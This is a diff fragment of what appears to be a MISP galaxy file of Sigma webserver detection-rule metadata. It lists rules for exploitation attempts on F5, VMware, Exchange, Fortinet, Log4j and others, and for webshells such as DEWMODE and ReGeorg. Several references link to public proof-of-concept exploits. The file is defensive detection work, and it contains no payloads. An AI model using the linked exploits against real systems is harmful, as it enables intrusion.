- "creation_date": "2020/07/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_5902_f5_bigip.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://support.f5.com/csp/article/K52145254",
- "https://twitter.com/yorickkoster/status/1279709009151434754",
- "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/",
- "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478",
- "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt"
- },
- {
- "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/02/24",
- "falsepositive": [
- "OVA uploads to your VSphere appliance"
- ],
- "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://swarm.ptsecurity.com/unauth-rce-vmware",
- "https://f5.pm/go-59627.html",
- "https://www.vmware.com/security/advisories/VMSA-2021-0002.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "179ed852-0f9b-4009-93a7-68475910fd86",
- "value": "CVE-2021-21972 VSphere Exploitation"
- },
- {
- "description": "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/12/27",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_46169_cacti_exploitation_attempt.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf",
- "https://github.com/rapid7/metasploit-framework/pull/17407",
- "https://github.com/0xf4n9x/CVE-2022-46169",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.46169"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "738cb115-881f-4df3-82cc-56ab02fc5192",
- "value": "Potential CVE-2022-46169 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/10",
- "falsepositive": [
- "Vulnerability scanning"
- ],
- "filename": "web_cve_2021_44228_log4j_fields.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://news.ycombinator.com/item?id=29504755",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9be472ed-893c-4ec0-94da-312d2765f654",
- "value": "Log4j RCE CVE-2021-44228 in Fields"
- },
- {
- "description": "Detects access to DEWMODE webshell as described in FIREEYE report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/02/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_unc2546_dewmode_php_webshell.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5",
- "value": "DEWMODE Webshell Access"
- },
- {
- "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/11/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2019_11510_pulsesecure_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.exploit-db.com/exploits/47297",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60",
- "value": "Pulse Secure Attack CVE-2019-11510"
- },
{
"description": "Detects possible Java payloads in web access logs",
"meta": {
@@ -85749,11 +81496,11 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035",
"https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/",
- "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
- "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
"https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/",
+ "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
+ "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035",
+ "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml"
],
"tags": [
@@ -85764,39 +81511,6 @@
"uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c",
"value": "Java Payload Strings"
},
- {
- "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/14",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_28480_exchange_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b",
- "value": "Exchange Exploitation CVE-2021-28480"
- },
{
"description": "Detects XSS attempts injected via GET requests in access logs",
"meta": {
@@ -85821,41 +81535,6 @@
"uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409",
"value": "Cross Site Scripting Strings"
},
- {
- "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/01/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw",
- "https://twitter.com/pyn3rd/status/1351696768065409026",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_2109_weblogic_rce_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2021.2109"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "687f6504-7f44-4549-91fc-f07bab065821",
- "value": "Oracle WebLogic Exploit CVE-2021-2109"
- },
{
"description": "Detects path traversal exploitation attempts",
"meta": {
@@ -85890,76 +81569,6 @@
"uuid": "7745c2ea-24a5-4290-b680-04359cb84b35",
"value": "Path Traversal Exploitation Attempts"
},
- {
- "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/11/17",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "filename": "web_cve_2021_42237_sitecore_report_ashx.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://blog.assetnote.io/2021/11/02/sitecore-rce/",
- "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f",
- "value": "Sitecore Pre-Auth RCE CVE-2021-42237"
- },
- {
- "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/07/19",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_33891_spark_shell_command_injection.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
- "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
- "https://github.com/apache/spark/pull/36315/files",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.33891"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c",
- "value": "Apache Spark Shell Command Injection - Weblogs"
- },
{
"description": "Detects known suspicious (default) user-agents related to scanning/recon tools",
"meta": {
@@ -85973,9 +81582,9 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
+ "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst",
"https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb",
"https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92",
- "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml"
],
"tags": [
@@ -85995,166 +81604,6 @@
"uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a",
"value": "Suspicious User-Agents Related To Recon Tools"
},
- {
- "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/08/12",
- "falsepositive": [
- "Vulnerability scanners",
- "Legitimate access to the URI"
- ],
- "filename": "web_cve_2022_31659_vmware_rce.yml",
- "level": "medium",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706",
- "value": "CVE-2022-31659 VMware Workspace ONE Access RCE"
- },
- {
- "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2020/12/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2018_13379_fortinet_preauth_read_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a2e97350-4285-43f2-a63f-d0daff291738",
- "value": "Fortinet CVE-2018-13379 Exploitation"
- },
- {
- "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs",
- "meta": {
- "author": "Bhabesh Raj, Florian Roth",
- "creation_date": "2021/08/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_22123_fortinet_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_22123_fortinet_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4",
- "value": "Fortinet CVE-2021-22123 Exploitation"
- },
- {
- "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Rich Warren",
- "creation_date": "2021/08/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_exchange_proxyshell.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_proxyshell.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef",
- "value": "Exchange ProxyShell Pattern"
- },
- {
- "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Rich Warren",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_exchange_proxyshell_successful.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml"
- ],
- "tags": [
- "attack.initial_access"
- ]
- },
- "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8",
- "value": "Successful Exchange ProxyShell Attack"
- },
{
"description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.",
"meta": {
@@ -86168,8 +81617,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://github.com/sensepost/reGeorg",
"https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3",
+ "https://github.com/sensepost/reGeorg",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml"
],
"tags": [
@@ -86189,403 +81638,6 @@
"uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003",
"value": "Webshell ReGeorg Detection Via Web Logs"
},
- {
- "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/10",
- "falsepositive": [
- "Vulnerability scanning"
- ],
- "filename": "web_cve_2021_44228_log4j.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://news.ycombinator.com/item?id=29504755",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702",
- "value": "Log4j RCE CVE-2021-44228 Generic"
- },
- {
- "description": "Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/01/20",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_44877_exploitation_attempt.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://seclists.org/fulldisclosure/2023/Jan/1",
- "https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.44877"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1b2eeb27-949b-4704-8bfa-d8e5cfa045a1",
- "value": "Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877"
- },
- {
- "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2019_3398_confluence.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b",
- "value": "Confluence Exploitation CVE-2019-3398"
- },
- {
- "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Christian Burkard (Nextron Systems)",
- "creation_date": "2021/08/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_33766_msexchange_proxytoken.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a",
- "value": "CVE-2021-33766 Exchange ProxyToken Exploitation"
- },
- {
- "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/08/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
- "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2",
- "https://www.tenable.com/security/research/tra-2021-13",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.20090",
- "cve.2021.20091"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f0500377-bc70-425d-ac8c-e956cd906871",
- "value": "Arcadyan Router Exploitations"
- },
- {
- "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/01/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
- "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_28188_terramaster_rce_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.28188"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e",
- "value": "TerraMaster TOS CVE-2020-28188"
- },
- {
- "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts",
- "meta": {
- "author": "Bhabesh Raj, Tim Shelton",
- "creation_date": "2020/12/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_10148_solarwinds_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://kb.cert.org/vuls/id/843464",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_10148_solarwinds_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af",
- "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass"
- },
- {
- "description": "Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.",
- "meta": {
- "author": "Isa Almannaei",
- "creation_date": "2023/02/13",
- "falsepositive": [
- "Vulnerability Scanners"
- ],
- "filename": "web_cve_2022_21587_oracle_ebs.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/",
- "https://github.com/hieuminhnv/CVE-2022-21587-POC",
- "https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis",
- "https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_21587_oracle_ebs.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.21587"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d033cb8a-8669-4a8e-a974-48d4185a8503",
- "value": "Potential CVE-2022-21587 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.",
- "meta": {
- "author": "Sittikorn S",
- "creation_date": "2021/09/24",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "filename": "web_cve_2021_22005_vmware_file_upload.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server",
- "https://kb.vmware.com/s/article/85717",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_22005_vmware_file_upload.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec",
- "value": "VMware vCenter Server File Upload CVE-2021-22005"
- },
- {
- "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n",
- "meta": {
- "author": "daffainfo, Florian Roth",
- "creation_date": "2021/10/05",
- "falsepositive": [
